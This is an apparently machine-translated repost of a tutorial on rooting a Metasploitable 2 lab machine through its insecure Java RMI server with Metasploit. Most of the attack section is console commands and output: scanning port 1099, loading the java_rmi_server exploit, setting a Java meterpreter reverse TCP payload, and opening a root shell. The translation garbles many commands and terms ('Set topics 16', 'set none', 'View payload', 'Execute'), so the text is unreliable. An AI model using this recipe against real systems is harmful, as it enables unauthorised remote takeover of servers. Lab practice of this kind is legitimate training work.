قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use Java Remote Method Invocation to Root «Null Byte :: WonderHowTo

How to Use Java Remote Method Invocation to Root «Null Byte :: WonderHowTo



In the world of technology, there is often a compromise between comfort and safety. The Java Remote Method Invocation is a system where this compromise is just too real. The ability of a Java-written program to remotely communicate with another program can greatly enhance the usability of an app, but it can also create critical vulnerabilities that can compromise an attacker.

In this tutorial, we will use the Metasploit framework to attack an insecure instance of a Java RMI server on Metasploitable 2, a vulnerable virtual machine.

Introduction to Java RMI

The Java Remote Method Invocation or Java RMI is a mechanism that allows an object that exists in a Java virtual machine to access and invoke methods contained in another Java Virtual Machine are included; This is basically the same as a remote procedure call, but in an object-oriented paradigm rather than a procedural paradigm that allows communication between Java programs that are not in the same address space.

One of the main advantages of RMI is the ability for remote objects to load new classes that are not yet explicitly defined, extending the behavior and functionality of an application.

RMI applications typically consist of two programs: a client and a server. When the server is created, the methods of its objects are made available to the client. The communication is performed by two intermediate objects: the stub and the skeleton.

The stub is located on the client side and sends information to the server, e.g. For example, an identifier for the remote object, the name of the method to invoke, and other relevant parameters. The skeleton resides on the server and passes the request from the client to the remote object.

Vulnerabilities are encountered when the default, insecure configuration of the server exists, so classes can be loaded from any remote URL. Because method calls to the server do not require authentication, this can be exploited. Metasploit includes a module to search for Java RMI endpoints and a module to actively exploit this vulnerability.

Search for Java RMI

Start Metasploit by typing msfconsole in the terminal . There is an auxiliary scanner that we can use to determine if the Java RMI vulnerability exists on our target. At the command prompt, type Search rmi and look for the module "auxiliary / scanner / misc / java_rmi_server".

  msf> search rmi
[!] Module database cache has not yet been created with slow search

Matching modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary / scanner / misc / java_rmi_server 2011-10-15 normal Java RMI server Uncertain endpoint code execution scanner
exploit / multi / misc / java_rmi_server 2011-10-15 Awarded Java RMI Server Insecure Default Configuration Java code execution 

Next, type : auxiliary / scanner / misc / java_rmi_server and enter Options on to view the settings.

  msf> use auxiliary / scanner / misc / java_rmi_server
msf auxiliary (scanner / misc / java_rmi_server)> Options

Module Options (Utility / Scanner / misc / java_rmi_server):

Name Current setting required Description
---- --------------- -------- -----------
RHOSTS yes The destination address range or the CIDR identifier
RPORT 1099 yes The destination port (TCP)
THREADS 1 yes The number of concurrent threads 

Now we need to specify the destination by entering set rhosts 172.16.1.102 (use the IP address of your own destination). We can also increase the number of threads so that the scanner runs a little faster. Enter and set threads 16 to set the number of threads to 16, a relatively secure value. Finally, enter run (an alias for exploit) to scan the target.

  msf auxiliary (scanner / misc / java_rmi_server)> sets rhosts 172.16.1.102
rhosts => 172.16.1.102
msf auxiliary (scanner / misc / java_rmi_server)> Set topics 16
Threads => 16
msf auxiliary (scanner / misc / java_rmi_server)> execute

[+] 172.16.1.102:1099 - 172.16.1.102:1099 Java RMI endpoint detected: Class loader enabled
[*] Scanned 1 of 1 Hosts (100% complete)
[*] Submodule Completion Completed 

We can see that the scanner detected a Java RMI endpoint on port 1099, indicating that the target might be compromised. Let's try exploiting it.

Exploit Java RMI

Back in our previous search results, locate the exploit / multi / misc / java_rmi_server module and enter usage exploit / multi / misc /. java_rmi_server to load it. Now we can show the various options for this exploit

  msf auxiliary (scanner / misc / java_rmi_server)> use exploit / multi / misc / java_rmi_server
msf exploit (multi / misc / java_rmi_server)> options

Module options (exploit / multi / misc / java_rmi_server):

Name Current setting required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time the HTTP server waits for the payload request
RHOST yes The destination address
RPORT 1099 yes The destination port (TCP)
SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0
SRVPORT 8080 yes The local port to listen to.
SSL false no Negotiate SSL for inbound connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Exploit target:

ID name
- ----
0 Generic (Java payload) 

Type set rhost 172.16.1.102 (using the appropriate IP address) to specify the destination. All other options can now be kept as defaults. Next, use show payload to display the compatible payload for this exploit.

  msf exploit (multi / misc / java_rmi_server)> set host 172.16.1.102
rhost => 172.16.1.102
msf exploit (multi / misc / java_rmi_server)> View payload

Compatible payloads
======================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic / custom normal custom payload
generic / shell_bind_tcp normal Generic command shell, bind TCP inline
generic / shell_reverse_tcp normal generic command shell, reverse TCP inline
java / meterpreter / bind_tcp normal Java meterpreter, Java Bind TCP Stager
java / meterpreter / reverse_http normal java meterpreter, Java Reverse HTTP Stager
java / meterpreter / reverse_https normal java meterpreter, Java Reverse HTTPS Stager
java / meterpreter / reverse_tcp normal java meterpreter, Java Reverse TCP Stager
java / shell / bind_tcp normal command shell, Java Bind TCP Stager
java / shell / reverse_tcp normal command shell, java reverse TCP stager
java / shell_reverse_tcp normal Java Command Shell, reverse TCP inline 

We use the almighty meterpreter here with a reverse TCP shell. Enter set payload java / meterpreter / reverse_tcp to enable this payload.

  msf exploit (multi / misc / java_rmi_server)> set none java / meterpreter / reverse_tcp
Payload => java / meterpreter / reverse_tcp 

Let's review the current settings with options .

  msf exploit (multi / misc / java_rmi_server)> options

Module options (exploit / multi / misc / java_rmi_server):

Name Current setting required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time the HTTP server waits for the payload request
RHOST 172.16.1.102 yes The destination address
RPORT 1099 yes The destination port (TCP)
SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0
SRVPORT 8080 yes The local port to listen to.
SSL false no Negotiate SSL for inbound connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (java / meterpreter / reverse_tcp):

Name Current setting required Description
---- --------------- -------- -----------
LHOST yes The listening address (an interface can be specified)
LPORT 4444 yes The list port

Exploit target:

ID name
- ----
0 Generic (Java Payload) 

Since we are using a reverse shell, we need to specify the listening address. Enter lhost 172.16.1.100 (the IP address of your attacking machine) and we should go well. Enter run to start the exploit.

  msf exploit (multi / misc / java_rmi_server)> set lhost 172.16.1.100
lhost => 172.16.1.100
Execute msf exploit (multi / misc / java_rmi_server)>

[*] The reverse TCP handler started at 172.16.1.100:4444
[*] 172.16.1.102:1099 - Using the URL: http://0.0.0.0:8080/ALLdcZ02dnZmL
[*] 172.16.1.102:1099 - Local IP: http://172.16.1.100:8080/ALLdcZ02dnZmL
[*] 172.16.1.102:1099 - The server has been started.
[*] 172.16.1.102:1099 - RMI header is sent ...
[*] 172.16.1.102:1099 - RMI call is sent ...
[*] 172.16.1.102:1099 - Answered the request for payload JAR
[*] Send phase (53845 bytes) to 172.16.1.102
[*] Meterpreter Session 1 opened (172.16.1.100:4444 -> 172.16.1.102:38797) at 2018-09-25 11:35:32 -0500
[*] 172.16.1.102:1099 - The server has been stopped.

meterpreter> 

We can see that the exploit started a handler on our system, sent the RMI method call to the target, and successfully opened a meterpreter session. We can now use commands like getuid to let the user see meter-meter running on the target, and sysinfo to display information about the target.

  meterpreter> getuid
Server user name: root
meterpreter> sysinfo
Computer: metasplitable
Operating system: Linux 2.6.24-16 server (i386)
Meterpreter: java / linux 

We can also create a local shell with the command shell .

  meterpreter> shell
Process 1 created
Channel 1 created
IP address
1: lo:  mtu 16436 qdisc noqueue
Link / Loopback 00: 00: 00: 00: 00: 00 00: 00: 00: 00: 00: 00
inet 127.0.0.1/8 scope host lo
inet6 :: 1/128 domain host
valid_lft forever preferred_lft forever
2: eth0:  mtu 1500 qdisc pfifo_fast qlen 1000
Compound / ether 08: 00: 27: 77: 62: 6c brd ff: ff: ff: ff: ff: ff
inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
inet6 fe80 :: a00: 27ff: fe77: 626c / 64 area link
valide_lft forever preferred_lft forever 

We are now the root at this point, and from here the world is our oyster, as we essentially have full control over the target.

Wrapping Up

Good intentions and the promise of improved functionality can often lead to vulnerabilities in an application, as we have seen here. Today we covered the basic architecture and behavior of Java Remote Method Invocation, how to determine if there is a vulnerability and how to exploit this vulnerability with metasploit to ultimately gain root access to the target. We were able to possess the entire system essentially due to an insecure configuration .

Do not Miss: The Ultimate Command Cache for Metasploits Meterpreter

Cover Picture by Daria-Yakovleva / Pixabay [19659037]

Source link